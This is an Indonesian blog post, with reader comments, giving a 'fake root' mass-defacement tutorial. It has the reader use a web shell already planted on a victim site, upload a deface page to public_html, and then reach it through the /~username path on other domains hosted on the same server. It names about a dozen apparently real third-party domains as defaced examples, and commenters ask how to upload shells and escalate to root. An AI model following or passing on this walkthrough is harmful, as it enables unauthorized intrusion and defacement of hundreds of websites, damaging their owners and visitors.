Sebenarnya saya sendiri bingung mau diaksih judul apa. Saya dapet dari threadnya bang Rebels di Forum Devilzc0de. Aslinya User Enumeration tapi tidak serumit itu. :v . Yasudah, langsung saja prakteknya.
Berikut bahan-bahan yang diperlukan :
Reverse IP
Shell yang sudah tertanam di web korban.
Exploit :
http://www.example.com/~root
Cek web yang sudah tertanam shell dengan exploit diatas.
Contoh :
http://mysled.net/~root maka hasilnya forbidden.
Langkah selanjutnya, upload script deface di public_html .
ex : http://mysled.net/crot.html
Oke, sekarang saatnya melihat domain ayng berada satu server dengan http://mysled.net/.
Sobat bisa menggunakan web Reverse IP diatas atau jika shell sobat sudah dilengkapi dengan tools Local Domain Viewer(tools 1n73ction sudah ada), tinggan klik menu DOMAIN.
Wow, ada 874 domain.
Nah, cara melihat hasil fake root nya exploit begini :
http://www.example.com /~dirdibelakang public_html / scriptmu.html
Lihat dir dibelakang public-html
contoh , /home/mysledne/public_html/ .
Karena saya tadi mengupload script crot.html di public_html,
coba cek salahsatu domain yang satu server dengan exploit diatas.
Contoh domain yang satu server dengan http://mysled.net/ adalah http://80s-clothing.com
Cek, http://80s-clothing.com/~mysledne/crot.html
Defaced . 🙂
Hal itu akan terjadi di 800 domain lainnya tanpa ada susah susah melakukan mass deface server. Cukup tambahkan ~mysledne/crot.html
See More :
allaboutalberta.com/~mysledne/crot.html
http://aerosealcalgary.com/~mysledne/crot.html
http://aeroanalys.ca/~mysledne/crot.html
http://advicecounselling.com/~mysledne/crot.html
http://adultlifedirectory.com/~mysledne/crot.html
http://70s-fashion.net/~mysledne/crot.html
http://50s-fashion.com/~mysledne/crot.html
http://livre-audio.ca/~mysledne/crot.html
http://60s-fashion.net/~mysledne/crot.html
http://accountantscalgary.biz/~mysledne/crot.html
http://allaboutcalgary.com/~mysledne/crot.html
Dan amsih banyak lagi. Ada 800 domain lebih. 🙂
Sekian dan semoga bermanfaat.
./Nabilaholic404
Yang mau copas, sertakan sumber.
www.madura-cyber.org
Refrensi :
devilzc0de
Yoga Pamungkas says
nambah lagi deh ilmu nya 😀
Anonim says
Cara Uploadnya gimana??
cak oni says
waa puasa kog nambah ginian kang , bukannya ceramah 😀 v oioioi
sakti blood says
1. upload ke public_html nya gimana?
2. ga ngerti penjelasannya
Riypto rypto says
Tutornya kurang jelas, kurang detail.
lo buat tutor instant, keliatan copy paste.
chiaki says
lu nya aja yg bego. ngomong asal njeplak. tunjukin dong gw copas darimana .!
infinity blog says
kak.. mau tanya hehe
aku agak bingung kak.. kalau targetnya belum tertanam shell gimana kak ?
please reply
Dodhie Virgo says
Bang, Upload script deface gimana??
Hata Ke says
Bang, Waktu ane klik Domain di shell 1n73ction kok ada tulisan # can't ReaD -> [ /etc/named.conf ]
Anonim says
kalau saat di exploit gk forbidden gmn kak?
C0M64D3_V415H4KH says
Bro when i rooting server gcc permission denied.
how can i bypass it?